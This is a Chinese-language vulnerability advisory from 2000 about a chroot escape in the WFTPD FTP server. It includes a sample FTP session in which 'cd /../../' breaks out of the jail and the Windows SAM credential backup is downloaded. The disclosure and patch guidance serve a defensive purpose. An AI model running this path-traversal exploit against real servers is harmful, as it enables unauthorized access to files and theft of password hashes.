发布日期：2000-11-29
更新日期：2000-11-29

受影响系统：

    Texas Imperial Software WFTPD 3.0Pro
    Texas Imperial Software WFTPD 2.41RC14 Pro
    Texas Imperial Software WFTPD 2.41RC14
       - Microsoft Windows 95/98
       - Microsoft Windows NT 4.0
       - Microsoft Windows 2000

描述：

---

Winsock FTPd 是 Texas Imperial Software 开发的流行FTP服务器。其中存在一个
漏洞允许非授权用户访问到Winsock FTPd所在驱动器的根目录。安装过程中，管理员
可以选择启动chroot设置，但是由于设计上的缺陷，恶意的攻击者(包括匿名用户)可
以绕过chroot限制访问到根目录。

当用户输入cd ../../的时候，服务器一般提示"User is not allowed to ../../"，
并进入chroot环境。但是用户可以输入cd /../..，此时不再出现上述提示，成功进
入根目录。

如果Winsock FTPd和另外一些敏感信息位于同一个驱动器，则可以利用这个漏洞进一
步损害系统安全性。

<* 来源：Interstellar Overdrive (interdrive@home.com) *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

-----snip------
c:>ftp target.com
Connected to target.com
User (target.com:(none)): io
331 Give me your password, please
Password: XXXXXX
230 Logged in successfully
ftp>pwd
257 "/" is current directory     #io's directory here c:\wftpd\io
       #and it is chroot'ed
ftp>ls
200 PORT command okay
150 File Listing Follows in ASCII mode.
my_file.txt
my_code.c
226 Transfer finished successfully.
11 Bytes received in 0.01 seconds (1.10 Kbytes/sec)
ftp>cd ../../
501 User is not allowed to change to ../../ - returning to /.
ftp>
#until now chroot jail working fine...

#hmmm, lets try doing 'cd /../../'
ftp>cd /../../
250 "/../.." is current directory
ftp>ls
200 PORT command okay
150 File Listing Follows in ASCII mode.
wftpd
inetpub
DOS
WINA20.386
CONFIG.DOS
CONFIG.SYS
WINNT
AUTOEXEC.BAT
Program Files
TEMP
COMMAND.COM
......etc # cool !
#even more fun
ftp>cd /../../WINNT/repair/
250 "/../../WINNT/repair/" is current directory
ftp>get /../../WINNT/repair/sam._
200 PORT command okay.......etc we got the file...
---------snip-------



建议：

---

厂商补丁：

Wftpd 2.41 RC15和Wftpd v3.00 R2都已经解决了这个问题，NSFOCUS建议您尽快到
Wftpd的主页上去下载新的版本：

http://www.wftpd.com




浏览次数：6527
严重程度：0（网友投票）